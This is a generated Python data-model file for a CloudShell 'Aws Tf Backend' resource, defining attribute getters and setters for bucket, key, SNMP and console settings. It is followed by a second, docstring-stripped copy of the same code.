:rtype AutoLoadDetails
"""
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
"""
Returns the name of the Cloudshell model
:return:
"""
return 'AwsTfBackend'
@property
def bucket_name(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Bucket Name'] if 'Aws Tf Backend.Bucket Name' in self.attributes else None
@bucket_name.setter
def bucket_name(self, value):
"""
The name of the bucket to be used in order to save the state file
:type value: str
"""
self.attributes['Aws Tf Backend.Bucket Name'] = value
@property
def region_name(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Region Name'] if 'Aws Tf Backend.Region Name' in self.attributes else None
@region_name.setter
def region_name(self, value):
"""
The region in which the bucket resides
:type value: str
"""
self.attributes['Aws Tf Backend.Region Name'] = value
@property
def access_key(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.Access Key'] if 'Aws Tf Backend.Access Key' in self.attributes else None
@access_key.setter
def access_key(self, value):
"""
AWS access key
:type value: string
"""
self.attributes['Aws Tf Backend.Access Key'] = value
@property
def secret_key(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.Secret Key'] if 'Aws Tf Backend.Secret Key' in self.attributes else None
@secret_key.setter
def secret_key(self, value):
"""
AWS secret key
:type value: string
"""
self.attributes['Aws Tf Backend.Secret Key'] = value
@property
def cloud_provider(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Cloud Provider'] if 'Aws Tf Backend.Cloud Provider' in self.attributes else None
@cloud_provider.setter
def cloud_provider(self, value):
"""
In case Access Key and Secret Key were not filled - the keys from the cloud provider will be used.
:type value: str
"""
self.attributes['Aws Tf Backend.Cloud Provider'] = value
@property
def hide_address(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.hide_address'] if 'Aws Tf Backend.hide_address' in self.attributes else None
@hide_address.setter
def hide_address(self, value='true'):
"""
:type value: str
"""
self.attributes['Aws Tf Backend.hide_address'] = value
@property
def user(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.User'] if 'Aws Tf Backend.User' in self.attributes else None
@user.setter
def user(self, value):
"""
User with administrative privileges
:type value: str
"""
self.attributes['Aws Tf Backend.User'] = value
@property
def password(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.Password'] if 'Aws Tf Backend.Password' in self.attributes else None
@password.setter
def password(self, value):
"""
:type value: string
"""
self.attributes['Aws Tf Backend.Password'] = value
@property
def enable_password(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.Enable Password'] if 'Aws Tf Backend.Enable Password' in self.attributes else None
@enable_password.setter
def enable_password(self, value):
"""
The enable password is required by some CLI protocols such as Telnet and is required according to the device configuration.
:type value: string
"""
self.attributes['Aws Tf Backend.Enable Password'] = value
@property
def power_management(self):
"""
:rtype: bool
"""
return self.attributes['Aws Tf Backend.Power Management'] if 'Aws Tf Backend.Power Management' in self.attributes else None
@power_management.setter
def power_management(self, value=True):
"""
Used by the power management orchestration, if enabled, to determine whether to automatically manage the device power status. Enabled by default.
:type value: bool
"""
self.attributes['Aws Tf Backend.Power Management'] = value
@property
def sessions_concurrency_limit(self):
"""
:rtype: float
"""
return self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] if 'Aws Tf Backend.Sessions Concurrency Limit' in self.attributes else None
@sessions_concurrency_limit.setter
def sessions_concurrency_limit(self, value='1'):
"""
The maximum number of concurrent sessions that the driver will open to the device. Default is 1 (no concurrency).
:type value: float
"""
self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] = value
@property
def snmp_read_community(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.SNMP Read Community'] if 'Aws Tf Backend.SNMP Read Community' in self.attributes else None
@snmp_read_community.setter
def snmp_read_community(self, value):
"""
The SNMP Read-Only Community String is like a password. It is sent along with each SNMP Get-Request and allows (or denies) access to device.
:type value: string
"""
self.attributes['Aws Tf Backend.SNMP Read Community'] = value
@property
def snmp_write_community(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.SNMP Write Community'] if 'Aws Tf Backend.SNMP Write Community' in self.attributes else None
@snmp_write_community.setter
def snmp_write_community(self, value):
"""
The SNMP Write Community String is like a password. It is sent along with each SNMP Set-Request and allows (or denies) chaning MIBs values.
:type value: string
"""
self.attributes['Aws Tf Backend.SNMP Write Community'] = value
@property
def snmp_v3_user(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.SNMP V3 User'] if 'Aws Tf Backend.SNMP V3 User' in self.attributes else None
@snmp_v3_user.setter
def snmp_v3_user(self, value):
"""
Relevant only in case SNMP V3 is in use.
:type value: str
"""
self.attributes['Aws Tf Backend.SNMP V3 User'] = value
@property
def snmp_v3_password(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.SNMP V3 Password'] if 'Aws Tf Backend.SNMP V3 Password' in self.attributes else None
@snmp_v3_password.setter
def snmp_v3_password(self, value):
"""
Relevant only in case SNMP V3 is in use.
:type value: string
"""
self.attributes['Aws Tf Backend.SNMP V3 Password'] = value
@property
def snmp_v3_private_key(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.SNMP V3 Private Key'] if 'Aws Tf Backend.SNMP V3 Private Key' in self.attributes else None
@snmp_v3_private_key.setter
def snmp_v3_private_key(self, value):
"""
Relevant only in case SNMP V3 is in use.
:type value: str
"""
self.attributes['Aws Tf Backend.SNMP V3 Private Key'] = value
@property
def snmp_v3_authentication_protocol(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] if 'Aws Tf Backend.SNMP V3 Authentication Protocol' in self.attributes else None
@snmp_v3_authentication_protocol.setter
def snmp_v3_authentication_protocol(self, value='No Authentication Protocol'):
"""
Relevant only in case SNMP V3 is in use.
:type value: str
"""
self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] = value
@property
def snmp_v3_privacy_protocol(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] if 'Aws Tf Backend.SNMP V3 Privacy Protocol' in self.attributes else None
@snmp_v3_privacy_protocol.setter
def snmp_v3_privacy_protocol(self, value='No Privacy Protocol'):
"""
Relevant only in case SNMP V3 is in use.
:type value: str
"""
self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] = value
@property
def snmp_version(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.SNMP Version'] if 'Aws Tf Backend.SNMP Version' in self.attributes else None
@snmp_version.setter
def snmp_version(self, value=''):
"""
The version of SNMP to use. Possible values are v1, v2c and v3.
:type value: str
"""
self.attributes['Aws Tf Backend.SNMP Version'] = value
@property
def enable_snmp(self):
"""
:rtype: bool
"""
return self.attributes['Aws Tf Backend.Enable SNMP'] if 'Aws Tf Backend.Enable SNMP' in self.attributes else None
@enable_snmp.setter
def enable_snmp(self, value=True):
"""
If set to True and SNMP isn???t enabled yet in the device the Shell will automatically enable SNMP in the device when Autoload command is called. SNMP must be enabled on the device for the Autoload command to run successfully. True by default.
:type value: bool
"""
self.attributes['Aws Tf Backend.Enable SNMP'] = value
@property
def disable_snmp(self):
"""
:rtype: bool
"""
return self.attributes['Aws Tf Backend.Disable SNMP'] if 'Aws Tf Backend.Disable SNMP' in self.attributes else None
@disable_snmp.setter
def disable_snmp(self, value=False):
"""
If set to True SNMP will be disabled automatically by the Shell after the Autoload command execution is completed. False by default.
:type value: bool
"""
self.attributes['Aws Tf Backend.Disable SNMP'] = value
@property
def console_server_ip_address(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Console Server IP Address'] if 'Aws Tf Backend.Console Server IP Address' in self.attributes else None
@console_server_ip_address.setter
def console_server_ip_address(self, value):
"""
The IP address of the console server, in IPv4 format.
:type value: str
"""
self.attributes['Aws Tf Backend.Console Server IP Address'] = value
@property
def console_user(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Console User'] if 'Aws Tf Backend.Console User' in self.attributes else None
@console_user.setter
def console_user(self, value):
"""
:type value: str
"""
self.attributes['Aws Tf Backend.Console User'] = value
@property
def console_port(self):
"""
:rtype: float
"""
return self.attributes['Aws Tf Backend.Console Port'] if 'Aws Tf Backend.Console Port' in self.attributes else None
@console_port.setter
def console_port(self, value):
"""
The port on the console server, usually TCP port, which the device is associated with.
:type value: float
"""
self.attributes['Aws Tf Backend.Console Port'] = value
@property
def console_password(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.Console Password'] if 'Aws Tf Backend.Console Password' in self.attributes else None
@console_password.setter
def console_password(self, value):
"""
:type value: string
"""
self.attributes['Aws Tf Backend.Console Password'] = value
@property
def cli_connection_type(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.CLI Connection Type'] if 'Aws Tf Backend.CLI Connection Type' in self.attributes else None
@cli_connection_type.setter
def cli_connection_type(self, value='Auto'):
"""
The CLI connection type that will be used by the driver. Possible values are Auto, Console, SSH, Telnet and TCP. If Auto is selected the driver will choose the available connection type automatically. Default value is Auto.
:type value: str
"""
self.attributes['Aws Tf Backend.CLI Connection Type'] = value
@property
def cli_tcp_port(self):
"""
:rtype: float
"""
return self.attributes['Aws Tf Backend.CLI TCP Port'] if 'Aws Tf Backend.CLI TCP Port' in self.attributes else None
@cli_tcp_port.setter
def cli_tcp_port(self, value):
"""
TCP Port to user for CLI connection. If kept empty a default CLI port will be used based on the chosen protocol, for example Telnet will use port 23.
:type value: float
"""
self.attributes['Aws Tf Backend.CLI TCP Port'] = value
@property
def backup_location(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Backup Location'] if 'Aws Tf Backend.Backup Location' in self.attributes else None
@backup_location.setter
def backup_location(self, value):
"""
Used by the save/restore orchestration to determine where backups should be saved.
:type value: str
"""
self.attributes['Aws Tf Backend.Backup Location'] = value
@property
def backup_type(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Backup Type'] if 'Aws Tf Backend.Backup Type' in self.attributes else None
@backup_type.setter
def backup_type(self, value='File System'):
"""
Supported protocols for saving and restoring of configuration and firmware files. Possible values are 'File System' 'FTP' and 'TFTP'. Default value is 'File System'.
:type value: str
"""
self.attributes['Aws Tf Backend.Backup Type'] = value
@property
def backup_user(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.Backup User'] if 'Aws Tf Backend.Backup User' in self.attributes else None
@backup_user.setter
def backup_user(self, value):
"""
Username for the storage server used for saving and restoring of configuration and firmware files.
:type value: str
"""
self.attributes['Aws Tf Backend.Backup User'] = value
@property
def backup_password(self):
"""
:rtype: string
"""
return self.attributes['Aws Tf Backend.Backup Password'] if 'Aws Tf Backend.Backup Password' in self.attributes else None
@backup_password.setter
def backup_password(self, value):
"""
Password for the storage server used for saving and restoring of configuration and firmware files.
:type value: string
"""
self.attributes['Aws Tf Backend.Backup Password'] = value
@property
def name(self):
"""
:rtype: str
"""
return self._name
@name.setter
def name(self, value):
"""
:type value: str
"""
self._name = value
@property
def cloudshell_model_name(self):
"""
:rtype: str
"""
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
"""
:type value: str
"""
self._cloudshell_model_name = value
@property
def system_name(self):
"""
:rtype: str
"""
return self.attributes['CS_GenericResource.System Name'] if 'CS_GenericResource.System Name' in self.attributes else None
@system_name.setter
def system_name(self, value):
"""
A unique identifier for the device, if exists in the device terminal/os.
:type value: str
"""
self.attributes['CS_GenericResource.System Name'] = value
@property
def vendor(self):
"""
:rtype: str
"""
return self.attributes['CS_GenericResource.Vendor'] if 'CS_GenericResource.Vendor' in self.attributes else None
@vendor.setter
def vendor(self, value=''):
"""
The name of the device manufacture.
:type value: str
"""
self.attributes['CS_GenericResource.Vendor'] = value
@property
def contact_name(self):
"""
:rtype: str
"""
return self.attributes['CS_GenericResource.Contact Name'] if 'CS_GenericResource.Contact Name' in self.attributes else None
@contact_name.setter
def contact_name(self, value):
"""
The name of a contact registered in the device.
:type value: str
"""
self.attributes['CS_GenericResource.Contact Name'] = value
@property
def location(self):
"""
:rtype: str
"""
return self.attributes['CS_GenericResource.Location'] if 'CS_GenericResource.Location' in self.attributes else None
@location.setter
def location(self, value=''):
"""
The device physical location identifier. For example Lab1/Floor2/Row5/Slot4.
:type value: str
"""
self.attributes['CS_GenericResource.Location'] = value
@property
def model(self):
"""
:rtype: str
"""
return self.attributes['CS_GenericResource.Model'] if 'CS_GenericResource.Model' in self.attributes else None
@model.setter
def model(self, value=''):
"""
The device model. This information is typically used for abstract resource filtering.
:type value: str
"""
self.attributes['CS_GenericResource.Model'] = value
@property
def model_name(self):
"""
:rtype: str
"""
return self.attributes['CS_GenericResource.Model Name'] if 'CS_GenericResource.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
"""
The catalog name of the device model. This attribute will be displayed in CloudShell instead of the CloudShell model.
:type value: str
"""
self.attributes['CS_GenericResource.Model Name'] = value
class ResourcePort(object):
def __init__(self, name):
"""
"""
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.ResourcePort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
"""
Creates an instance of NXOS by given context
:param context: cloudshell.shell.core.driver_context.ResourceCommandContext
:type context: cloudshell.shell.core.driver_context.ResourceCommandContext
:return:
:rtype ResourcePort
"""
result = ResourcePort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
"""
:param relative_path:
:type relative_path: str
:return
"""
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
"""
Combines relative path
:param child_path: Path of a model within it parent model, i.e 1
:type child_path: str
:param parent_path: Full path of parent model, i.e 1/1. Might be empty for root model
:type parent_path: str
:return: Combined path
:rtype str
"""
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
"""
Merges two instances of AutoLoadDetails into the first one
:param autoload_details1:
:type autoload_details1: AutoLoadDetails
:param autoload_details2:
:type autoload_details2: AutoLoadDetails
:return:
:rtype AutoLoadDetails
"""
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
"""
Returns the name of the Cloudshell model
:return:
"""
return 'ResourcePort'
@property
def mac_address(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] if 'Aws Tf Backend.ResourcePort.MAC Address' in self.attributes else None
@mac_address.setter
def mac_address(self, value=''):
"""
:type value: str
"""
self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] = value
@property
def ipv4_address(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] if 'Aws Tf Backend.ResourcePort.IPv4 Address' in self.attributes else None
@ipv4_address.setter
def ipv4_address(self, value):
"""
:type value: str
"""
self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] = value
@property
def ipv6_address(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] if 'Aws Tf Backend.ResourcePort.IPv6 Address' in self.attributes else None
@ipv6_address.setter
def ipv6_address(self, value):
"""
:type value: str
"""
self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] = value
@property
def port_speed(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] if 'Aws Tf Backend.ResourcePort.Port Speed' in self.attributes else None
@port_speed.setter
def port_speed(self, value):
"""
The port speed (e.g 10Gb/s, 40Gb/s, 100Mb/s)
:type value: str
"""
self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] = value
@property
def name(self):
"""
:rtype: str
"""
return self._name
@name.setter
def name(self, value):
"""
:type value: str
"""
self._name = value
@property
def cloudshell_model_name(self):
"""
:rtype: str
"""
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
"""
:type value: str
"""
self._cloudshell_model_name = value
@property
def model_name(self):
"""
:rtype: str
"""
return self.attributes['CS_Port.Model Name'] if 'CS_Port.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
"""
The catalog name of the device model. This attribute will be displayed in CloudShell instead of the CloudShell model.
:type value: str
"""
self.attributes['CS_Port.Model Name'] = value
class GenericPowerPort(object):
def __init__(self, name):
"""
"""
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.GenericPowerPort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
"""
Creates an instance of NXOS by given context
:param context: cloudshell.shell.core.driver_context.ResourceCommandContext
:type context: cloudshell.shell.core.driver_context.ResourceCommandContext
:return:
:rtype GenericPowerPort
"""
result = GenericPowerPort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
"""
:param relative_path:
:type relative_path: str
:return
"""
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
"""
Combines relative path
:param child_path: Path of a model within it parent model, i.e 1
:type child_path: str
:param parent_path: Full path of parent model, i.e 1/1. Might be empty for root model
:type parent_path: str
:return: Combined path
:rtype str
"""
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
"""
Merges two instances of AutoLoadDetails into the first one
:param autoload_details1:
:type autoload_details1: AutoLoadDetails
:param autoload_details2:
:type autoload_details2: AutoLoadDetails
:return:
:rtype AutoLoadDetails
"""
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
"""
Returns the name of the Cloudshell model
:return:
"""
return 'GenericPowerPort'
@property
def model(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.GenericPowerPort.Model'] if 'Aws Tf Backend.GenericPowerPort.Model' in self.attributes else None
@model.setter
def model(self, value):
"""
The device model. This information is typically used for abstract resource filtering.
:type value: str
"""
self.attributes['Aws Tf Backend.GenericPowerPort.Model'] = value
@property
def serial_number(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] if 'Aws Tf Backend.GenericPowerPort.Serial Number' in self.attributes else None
@serial_number.setter
def serial_number(self, value):
"""
:type value: str
"""
self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] = value
@property
def version(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.GenericPowerPort.Version'] if 'Aws Tf Backend.GenericPowerPort.Version' in self.attributes else None
@version.setter
def version(self, value):
"""
The firmware version of the resource.
:type value: str
"""
self.attributes['Aws Tf Backend.GenericPowerPort.Version'] = value
@property
def port_description(self):
"""
:rtype: str
"""
return self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] if 'Aws Tf Backend.GenericPowerPort.Port Description' in self.attributes else None
@port_description.setter
def port_description(self, value):
"""
The description of the port as configured in the device.
:type value: str
"""
self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] = value
@property
def name(self):
"""
:rtype: str
"""
return self._name
@name.setter
def name(self, value):
"""
:type value: str
"""
self._name = value
@property
def cloudshell_model_name(self):
"""
:rtype: str
"""
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
"""
:type value: str
"""
self._cloudshell_model_name = value
@property
def model_name(self):
"""
:rtype: str
"""
return self.attributes['CS_PowerPort.Model Name'] if 'CS_PowerPort.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
"""
The catalog name of the device model. This attribute will be displayed in CloudShell instead of the CloudShell model.
:type value: str
"""
self.attributes['CS_PowerPort.Model Name'] = value
| 33.1125 | 251 | 0.629024 | from cloudshell.shell.core.driver_context import ResourceCommandContext, AutoLoadDetails, AutoLoadAttribute, \
AutoLoadResource
from collections import defaultdict
class LegacyUtils(object):
def __init__(self):
self._datamodel_clss_dict = self.__generate_datamodel_classes_dict()
def migrate_autoload_details(self, autoload_details, context):
model_name = context.resource.model
root_name = context.resource.name
root = self.__create_resource_from_datamodel(model_name, root_name)
attributes = self.__create_attributes_dict(autoload_details.attributes)
self.__attach_attributes_to_resource(attributes, '', root)
self.__build_sub_resoruces_hierarchy(root, autoload_details.resources, attributes)
return root
def __create_resource_from_datamodel(self, model_name, res_name):
return self._datamodel_clss_dict[model_name](res_name)
def __create_attributes_dict(self, attributes_lst):
d = defaultdict(list)
for attribute in attributes_lst:
d[attribute.relative_address].append(attribute)
return d
def __build_sub_resoruces_hierarchy(self, root, sub_resources, attributes):
d = defaultdict(list)
for resource in sub_resources:
splitted = resource.relative_address.split('/')
parent = '' if len(splitted) == 1 else resource.relative_address.rsplit('/', 1)[0]
rank = len(splitted)
d[rank].append((parent, resource))
self.__set_models_hierarchy_recursively(d, 1, root, '', attributes)
def __set_models_hierarchy_recursively(self, dict, rank, manipulated_resource, resource_relative_addr, attributes):
if rank not in dict:
pass
for (parent, resource) in dict[rank]:
if parent == resource_relative_addr:
sub_resource = self.__create_resource_from_datamodel(
resource.model.replace(' ', ''),
resource.name)
self.__attach_attributes_to_resource(attributes, resource.relative_address, sub_resource)
manipulated_resource.add_sub_resource(
self.__slice_parent_from_relative_path(parent, resource.relative_address), sub_resource)
self.__set_models_hierarchy_recursively(
dict,
rank + 1,
sub_resource,
resource.relative_address,
attributes)
def __attach_attributes_to_resource(self, attributes, curr_relative_addr, resource):
for attribute in attributes[curr_relative_addr]:
setattr(resource, attribute.attribute_name.lower().replace(' ', '_'), attribute.attribute_value)
del attributes[curr_relative_addr]
def __slice_parent_from_relative_path(self, parent, relative_addr):
if parent is '':
return relative_addr
return relative_addr[len(parent) + 1:]
def __generate_datamodel_classes_dict(self):
return dict(self.__collect_generated_classes())
def __collect_generated_classes(self):
import sys, inspect
return inspect.getmembers(sys.modules[__name__], inspect.isclass)
class AwsTfBackend(object):
def __init__(self, name):
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
result = AwsTfBackend(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
return 'AwsTfBackend'
@property
def bucket_name(self):
return self.attributes['Aws Tf Backend.Bucket Name'] if 'Aws Tf Backend.Bucket Name' in self.attributes else None
@bucket_name.setter
def bucket_name(self, value):
self.attributes['Aws Tf Backend.Bucket Name'] = value
@property
def region_name(self):
return self.attributes['Aws Tf Backend.Region Name'] if 'Aws Tf Backend.Region Name' in self.attributes else None
@region_name.setter
def region_name(self, value):
self.attributes['Aws Tf Backend.Region Name'] = value
@property
def access_key(self):
return self.attributes['Aws Tf Backend.Access Key'] if 'Aws Tf Backend.Access Key' in self.attributes else None
@access_key.setter
def access_key(self, value):
self.attributes['Aws Tf Backend.Access Key'] = value
@property
def secret_key(self):
return self.attributes['Aws Tf Backend.Secret Key'] if 'Aws Tf Backend.Secret Key' in self.attributes else None
@secret_key.setter
def secret_key(self, value):
self.attributes['Aws Tf Backend.Secret Key'] = value
@property
def cloud_provider(self):
return self.attributes['Aws Tf Backend.Cloud Provider'] if 'Aws Tf Backend.Cloud Provider' in self.attributes else None
@cloud_provider.setter
def cloud_provider(self, value):
self.attributes['Aws Tf Backend.Cloud Provider'] = value
@property
def hide_address(self):
return self.attributes['Aws Tf Backend.hide_address'] if 'Aws Tf Backend.hide_address' in self.attributes else None
@hide_address.setter
def hide_address(self, value='true'):
self.attributes['Aws Tf Backend.hide_address'] = value
@property
def user(self):
return self.attributes['Aws Tf Backend.User'] if 'Aws Tf Backend.User' in self.attributes else None
@user.setter
def user(self, value):
self.attributes['Aws Tf Backend.User'] = value
@property
def password(self):
return self.attributes['Aws Tf Backend.Password'] if 'Aws Tf Backend.Password' in self.attributes else None
@password.setter
def password(self, value):
self.attributes['Aws Tf Backend.Password'] = value
@property
def enable_password(self):
return self.attributes['Aws Tf Backend.Enable Password'] if 'Aws Tf Backend.Enable Password' in self.attributes else None
@enable_password.setter
def enable_password(self, value):
self.attributes['Aws Tf Backend.Enable Password'] = value
@property
def power_management(self):
return self.attributes['Aws Tf Backend.Power Management'] if 'Aws Tf Backend.Power Management' in self.attributes else None
@power_management.setter
def power_management(self, value=True):
self.attributes['Aws Tf Backend.Power Management'] = value
@property
def sessions_concurrency_limit(self):
return self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] if 'Aws Tf Backend.Sessions Concurrency Limit' in self.attributes else None
@sessions_concurrency_limit.setter
def sessions_concurrency_limit(self, value='1'):
self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] = value
@property
def snmp_read_community(self):
return self.attributes['Aws Tf Backend.SNMP Read Community'] if 'Aws Tf Backend.SNMP Read Community' in self.attributes else None
@snmp_read_community.setter
def snmp_read_community(self, value):
self.attributes['Aws Tf Backend.SNMP Read Community'] = value
@property
def snmp_write_community(self):
return self.attributes['Aws Tf Backend.SNMP Write Community'] if 'Aws Tf Backend.SNMP Write Community' in self.attributes else None
@snmp_write_community.setter
def snmp_write_community(self, value):
self.attributes['Aws Tf Backend.SNMP Write Community'] = value
@property
def snmp_v3_user(self):
return self.attributes['Aws Tf Backend.SNMP V3 User'] if 'Aws Tf Backend.SNMP V3 User' in self.attributes else None
@snmp_v3_user.setter
def snmp_v3_user(self, value):
self.attributes['Aws Tf Backend.SNMP V3 User'] = value
@property
def snmp_v3_password(self):
return self.attributes['Aws Tf Backend.SNMP V3 Password'] if 'Aws Tf Backend.SNMP V3 Password' in self.attributes else None
@snmp_v3_password.setter
def snmp_v3_password(self, value):
self.attributes['Aws Tf Backend.SNMP V3 Password'] = value
@property
def snmp_v3_private_key(self):
return self.attributes['Aws Tf Backend.SNMP V3 Private Key'] if 'Aws Tf Backend.SNMP V3 Private Key' in self.attributes else None
@snmp_v3_private_key.setter
def snmp_v3_private_key(self, value):
self.attributes['Aws Tf Backend.SNMP V3 Private Key'] = value
@property
def snmp_v3_authentication_protocol(self):
return self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] if 'Aws Tf Backend.SNMP V3 Authentication Protocol' in self.attributes else None
@snmp_v3_authentication_protocol.setter
def snmp_v3_authentication_protocol(self, value='No Authentication Protocol'):
self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] = value
@property
def snmp_v3_privacy_protocol(self):
return self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] if 'Aws Tf Backend.SNMP V3 Privacy Protocol' in self.attributes else None
@snmp_v3_privacy_protocol.setter
def snmp_v3_privacy_protocol(self, value='No Privacy Protocol'):
self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] = value
@property
def snmp_version(self):
return self.attributes['Aws Tf Backend.SNMP Version'] if 'Aws Tf Backend.SNMP Version' in self.attributes else None
@snmp_version.setter
def snmp_version(self, value=''):
self.attributes['Aws Tf Backend.SNMP Version'] = value
@property
def enable_snmp(self):
return self.attributes['Aws Tf Backend.Enable SNMP'] if 'Aws Tf Backend.Enable SNMP' in self.attributes else None
@enable_snmp.setter
def enable_snmp(self, value=True):
self.attributes['Aws Tf Backend.Enable SNMP'] = value
@property
def disable_snmp(self):
return self.attributes['Aws Tf Backend.Disable SNMP'] if 'Aws Tf Backend.Disable SNMP' in self.attributes else None
@disable_snmp.setter
def disable_snmp(self, value=False):
self.attributes['Aws Tf Backend.Disable SNMP'] = value
@property
def console_server_ip_address(self):
return self.attributes['Aws Tf Backend.Console Server IP Address'] if 'Aws Tf Backend.Console Server IP Address' in self.attributes else None
@console_server_ip_address.setter
def console_server_ip_address(self, value):
self.attributes['Aws Tf Backend.Console Server IP Address'] = value
@property
